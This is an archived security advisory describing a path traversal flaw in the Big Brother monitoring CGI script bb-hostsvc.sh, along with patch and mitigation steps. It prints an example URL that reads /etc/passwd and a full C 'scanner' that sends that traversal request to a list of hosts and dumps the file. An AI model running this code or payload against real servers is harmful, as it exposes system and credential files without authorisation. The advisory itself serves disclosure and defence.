TUCoPS :: Unix :: General :: bb2~1.txt

Big Brother arbitrary file retrieval problem

COMMAND

    Big Brother

SYSTEMS AFFECTED

    Big Brother up tp and including 1.4H

PROBLEM

    Eric Hines posted following.  With code  below you  can view   the
    contents of any  file on the  remote system including  /etc/passwd
    or  /etc/shadow.   This  was  identified  and  Proof of Concept by
    Safety and Loki [LoA].

    The  problem  exists  in  the  code  where  $HOSTSVC  does  not do
    authenticity checking for its assigned variable.

        ---- snip ----
        # get the color of the status from the status file
        set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1 BKG="$1"
        ---- snap ----

    Example:

        http://www.bb4.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd

    Here's the scanner for this vulnerability:

    /*
     *
     *  2000-07-11
     *
     *  Ripped from  phfscan.c
     *      Big Brother Vulnarability scanner.
     *  Scans for /cgi-bin/bb-hostsvc.sh.
     *  If it exists you might be able to read files from
     *  the system. Good luck.
     *
     *
     *       Author:  Safety@IRCnet who also discovered the bug.
     *            Safety@LinuxMail.ORG
     *
     *
     *       Credits: #roothat, #vastervik, #smile, Loki, crimson, self,
     *                Bjurr, Metoo, and everyone else who think they should
     *            be on this list.
     *
     *   Special Thanks goes to Loki who are going to host and design
     *   my homepage.
     *
     *
     *   Usage:
     *
     *       ./bbscan < hostlist > outputfile
     *
     */

    #include <sys/stat.h>
    #include <sys/types.h>
    #include <termios.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <fcntl.h>
    #include <sys/syslog.h>
    #include <sys/param.h>
    #include <sys/times.h>
    #ifdef LINUX
    #include <sys/time.h>
    #endif
    #include <unistd.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <sys/signal.h>
    #include <arpa/inet.h>
    #include <netdb.h>

    int FLAG = 1;
    int Call(int signo)
    {
     FLAG = 0;
    }

    main (int argc, char *argv[])
    {
      char host[100], buffer[1024], hosta[1024],FileBuf[8097];
      int outsocket, serv_len, len,X,c,outfd;
      struct hostent *nametocheck;
      struct sockaddr_in serv_addr;
      struct in_addr outgoing;

      char bbvuln[]="GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n";

      while(fgets(hosta,100,stdin))
        {
          if(hosta[0] == '\0')
            break;
          hosta[strlen(hosta) -1] = '\0';
          write(1,hosta,strlen(hosta)*sizeof(char));
            write(1,"\n",sizeof(char));
          outsocket = socket (AF_INET, SOCK_STREAM, 0);
          memset (&serv_addr, 0, sizeof (serv_addr));
          serv_addr.sin_family = AF_INET;

          nametocheck = gethostbyname (hosta);

          /* Ugly stuff to get host name into inet_ntoa form */
          (void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],
                           sizeof (outgoing.s_addr));
          strncpy(host, inet_ntoa (outgoing), 100);
          serv_addr.sin_addr.s_addr = inet_addr (host);
          serv_addr.sin_port = htons (80);
          signal(SIGALRM,Call);
          FLAG = 1;

          alarm(10);

          X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
          alarm(0);

          if(FLAG == 1 && X==0){
           write(outsocket,bbvuln,strlen(bbvuln)*sizeof(char));
           while((X=read(outsocket,FileBuf,8096))!=0)
              write(1,FileBuf,X);
            }
          close (outsocket);
        }
      return 0;
    }

SOLUTION

    BB4 Technologies has already been notified and a patch is  already
    out.  It can be Downloaded from

        http://www.bb4.com/download.html

    Required  only  on  hosts  that  are  defined as BBDISPLAY.  Don't
    forget hosts that were at one point BBDISPLAY but were turned into
    a client only host afterwards.

    1) If  you  have  BBLOGSTATUS=DYNAMIC  set  in etc/bbdef.sh,  then
       download  BB  1.4h2  and  extract  bb-hostsvc.sh.   Replace the
       script  in  the  cgi-bin  and  set  the  BBHOME variable in the
       bb-hostsvc.sh  script.   Make  sure  the  script has the proper
       permissions.

    2) If  you  have  BBLOGSTATUS=STATIC  or  BBLOGSTATUS=TEXT set  in
       etc/bbdef.sh,  then  just  remove  the  bb-hostsvc.sh  from the
       cgi-bin directory as it is not required for these setups.

    3) Set  BBLOGSTATUS=STATIC in  bbdef.sh and  remove the  script as
       described in 2).

    Jake Schleich  found that  by just  downloading the  new 1.4h2 and
    running the bbconfig  and filling in  the variables, it  overwrote
    the  offending  file  without  me  having  to reinstall the entire
    thing; a pain when it comes to reconfiguring. It asks which  files
    it will overwrite in  the cgi-bin, you just  say no to the  custom
    ones(if you have replaced a few of the default bb cgi's with  /ext
    released versions as  I have) and  replace the offending  file(s).
    So in short,  the bbconfig script  will fix the  problem without a
    rebuild.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH